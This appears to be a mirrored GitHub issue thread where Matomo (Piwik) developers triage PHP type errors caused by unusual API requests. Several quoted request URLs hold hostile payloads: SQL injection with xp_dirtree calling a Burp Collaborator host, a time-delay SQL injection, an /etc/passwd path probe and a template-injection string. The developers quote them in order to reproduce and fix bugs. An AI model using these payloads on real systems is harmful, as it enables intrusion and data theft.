@mattab opened this Issue on September 29th 2018 Member

as seen on production many times:

first error message (more below)

Argument 1 passed to Piwik\Plugins\UsersManager\Model::getUsers() must be of the type array, null given, called in /plugins\/UsersManager\/API.php on line 351

URL: index.php?module=API&method=UsersManager.getUsers&format=Tsv&token_auth=XYZANONYMIZED&translateColumnNames=1&userLogins[]=&userLogins[]=

@mattab commented on September 29th 2018 Member

And this second one

Error: {"message":"Argument 1 passed to Piwik\Period::__construct() must be an instance of Piwik\Date, array given, called in \/core\/Period\/Factory.php on line 91","file":"\///core\/Period.php","line":61}

URL: index.php?date[$acunetix]=1&format=rss&idSite=1&method=Transitions.getTransitionsForPageUrl&module=API&pageUrl=http://forum.piwik.org/&period=day&token_auth=XYZANONYMIZED&translateColumnNames=1

@mattab commented on September 29th 2018 Member

And this third one

Error: {"message":"Argument 1 passed to Piwik\Period::__construct() must be an instance of Piwik\Date, array given, called in \/core\/Period\/Factory.php on line 91","file":"\/core\/Period.php","line":61}

URL: index.php?date[]=yesterday&format=Tsv&idSite=1&method=Overlay.getFollowingPages&module=API&period=day&token_auth=XYZANONYMIZED&translateColumnNames=1&url=http://forum.piwik.org/

@mattab commented on September 29th 2018 Member

And this fourth one:

Error: {"message":"Call to undefined method Piwik\DataTable\Map::getRowFromLabel()","/plugins\/UserCountry\/API.php","line":45}

URL: index.php?module=API&method=API.getRowEvolution&idSite=1%2c%201%2c%202%2c%203)%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%.irtree%20@q%3b--%20&period=day&date=last10&apiModule=UserCountry&apiAction=getCountry&legendAppendMetric=1&labelUseAbsoluteUrl=1&format=rss&token_auth=XYZANONYMIZED&translateColumnNames=1

@mattab commented on September 29th 2018 Member

And this fifth one

Error: {"message":"An exception has been thrown during the rendering of a template (\"Date format must be: YYYY-MM-DD, or 'today' or 'yesterday' or any keyword supported by the strtotime function (see http:\/\/php.net\/strtotime for more information): \").","file":"\/\/plugins\/PrivacyManager\/templates\/gdprOverview.twig","line":17}

URL: index.php?action=gdprOverview&date=/etc/passwd&idSite=1&module=PrivacyManager&period=day

@mattab commented on September 29th 2018 Member

And this sixth one

Error: {"message":"Unsupported operand types","file":"\/\/plugins\/ExampleAPI\/API.php","line":79}

URL: index.php?module=API&method=ExampleAPI.getSum&b=0&format=JSON&token_auth=XYZANONYMIZED&a[]=0&a[]=l1dt1`z'z"${{%25{{\

@mattab commented on September 29th 2018 Member

And this seventh one

Error: {"message":"Call to undefined method Piwik\DataTable\Map::getRows()","file":"\/\/plugins\/ImageGraph\/API.php","line":389}

URL: index.php?module=API&method=ImageGraph.get&idSite=1%2c%201%2c%202%2c%203)%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c4fkjoel0xnf6n8brbm6daukge7k680ao1mpdc50u.burpcollab'%2b'orator.net%5cdoe'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&period=day&date=yesterday&apiModule=UserCountry&apiAction=getCountry&outputType=0&showLegend=1&fontSize=9&aliasedGraph=1&textColor=222222&backgroundColor=FFFFFF&gridColor=CCCCCC&legendAppendMetric=1&format=xml&token_auth=XYZANONYMIZED

@sgiehl commented on September 30th 2018 Member

not able to reproduce the first and fifth one locally

@mattab commented on September 30th 2018 Member

@sgiehl Could you try searching the alerts emails with the error message from 1) and 5) ? there are several examples of 1) and 5) with different payloads so you should be able to reproduce eventually?

@mattab commented on October 1st 2018 Member

@sgiehl There is also this 8):

and this eighth

Error: {"message":"An exception has been thrown during the rendering of a template (\"The parameter 'idSite' doesn't have a correct type, and a default value wasn't provided.\").","file":"\/plugins\/CoreVisualizations\/templates\/_dataTableViz_jqplotGraph.twig","line":2}

URL: index.php?date=2018-09-30&viewDataTable=graphEvolution&dateUsedInGraph=2018-09-01%2C2018-09-30&evolution_day_last_n=30&columns=nb_visits%2Cnb_uniq_visitors&forceView=1&module=Referrers&action=getEvolutionGraph&idSite=1%2c0)waitfor%20delay'0%3a0%3a20'--&period=day&random=7171&rows=Total&filter_sort_column=nb_visits&disable_generic_filters=0

@sgiehl commented on October 1st 2018 Member

@mattab was able to reproduce and propose a fix for 1) but still can't reproduce 5) locally. Were you able to reproduce that on cloud?

@mattab commented on October 2nd 2018 Member

Yes could reproduce it on cloud, there are a few different ones actually... Did you try some of the other payloads?

@sgiehl commented on October 3rd 2018 Member

Error: {"message":"An exception has been thrown during the rendering of a template ("Date format must be: YYYY-MM-DD, or 'today' or 'yesterday' or any keyword supported by the strtotime function (see http://php.net/strtotime for more information): ").","file":"//plugins/PrivacyManager/templates/gdprOverview.twig","line":17}

URL: index.php?action=gdprOverview&date=/etc/passwd&idSite=1&module=PrivacyManager&period=day

@mattab that seems to happen in the event Template.afterGDPROverviewIntro, which is currently only in use by cloud plugin. Don't have a install running with the plugin atm, so I can't reproduce. Looking at the code I didn't find anything that could cause the error

@mattab commented on October 8th 2018 Member

Thanks. Marking as closed for now :+1:

This Issue was closed on October 8th 2018
Powered by GitHub Issue Mirror